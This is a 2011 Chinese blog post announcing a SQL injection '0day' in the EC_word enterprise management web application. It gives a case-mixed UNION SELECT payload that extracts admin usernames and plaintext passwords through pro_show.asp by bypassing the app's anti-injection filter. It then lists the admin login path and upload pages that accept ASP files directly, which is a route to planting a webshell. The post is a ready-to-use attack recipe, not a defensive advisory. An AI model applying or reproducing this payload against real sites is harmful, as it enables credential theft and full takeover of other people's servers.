注册 登录  
 加关注
查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

小猪太子--网易博客

关注网络安全,低调求发展。

 
 
 

日志

 
 
关于我

看起来没什么新鲜的,其貌不扬,个头一般,没獠牙,呼吸空气,肋下没逆鳞,吃的是碳水化合物,看构造变形的可能性也不大,人畜无害的家伙。

EC_word企业管理SQL注入0day  

2011-07-13 08:01:51|  分类: 漏洞播报 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
该程序采用枫叶通用防注入1.0 asp版,此防注入完全鸡肋,该网站程序pro_show.asp有cookies注入或者变型注入,注入前可以先判断一下字段数:ORdeR By xx 
 
EXP:ANd 1=1 UNiOn SElEcT 1,username,3,4,5,6,7,8,9,10,password1,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FrOm lei_admin
 
密码为明文,后台地址:admin/index/login.asp
 
后台上传地址:admin/inc/upfile.htm 可直接上传asp文件  上传路径admin/upimg/
有些后台有双文件上传漏洞:admin/inc/upfiletwo.asp 
 
有些后台还有eweb编辑器
  评论这张
 
阅读(1062)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018